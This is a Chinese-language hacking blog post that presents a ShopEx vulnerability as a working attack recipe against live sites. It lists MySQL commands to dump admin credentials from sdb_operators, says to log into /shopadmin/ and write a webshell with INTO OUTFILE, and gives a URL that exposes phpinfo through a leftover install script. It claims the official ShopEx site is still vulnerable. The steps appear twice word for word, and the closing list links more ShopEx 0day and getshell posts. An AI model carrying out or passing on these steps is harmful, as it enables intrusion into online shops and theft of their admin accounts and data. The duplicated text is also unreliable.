利用前提是程序所应用的数据库服务器,可以外连.这个很关键.
自己搞站时候.遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下.
找到一个漏洞.还是发出来吧.
读取任意文件漏洞:
可以连上数据库.
mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;
得到管理员用户密码./shopadmin/ 登陆
后台拿shell,没有仔细研究.
我测试的站,直接用into outfile 一个shell.
网上有个帖子,说可以爆物理路径.测试不可用.
如果install目录没删.下面这个可以看phpinfo
mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;
得到管理员用户密码./shopadmin/ 登陆
后台拿shell,没有仔细研究.
我测试的站,直接用into outfile 一个shell.
网上有个帖子,说可以爆物理路径.测试不可用.
如果install目录没删.下面这个可以看phpinfo
- http://www.target.com/install/svinfo.php?phpinfo=true
另外/home/cache/目录的文件,也是可以爆出来的.
目前shopex 官方站,仍然存在该漏洞. 测试截图如下
目前shopex 官方站,仍然存在该漏洞. 测试截图如下
只显示10条记录相关文章
shopex拿shell (浏览: 15535, 评论: 0)
shopex 注入 0day (4.8.5) (浏览: 10311, 评论: 0)
shopex 4.8.5.45144 getshell 囧版 0day (浏览: 10690, 评论: 0)
SHOPEX最新漏洞利用 (浏览: 10520, 评论: 0)
ShopEx PHP远程包含漏洞 (浏览: 10221, 评论: 0)
ShopEx 4.7.2 漏洞 (浏览: 13041, 评论: 0)
shopex 注入 0day (4.8.5) (浏览: 10311, 评论: 0)
shopex 4.8.5.45144 getshell 囧版 0day (浏览: 10690, 评论: 0)
SHOPEX最新漏洞利用 (浏览: 10520, 评论: 0)
ShopEx PHP远程包含漏洞 (浏览: 10221, 评论: 0)
ShopEx 4.7.2 漏洞 (浏览: 13041, 评论: 0)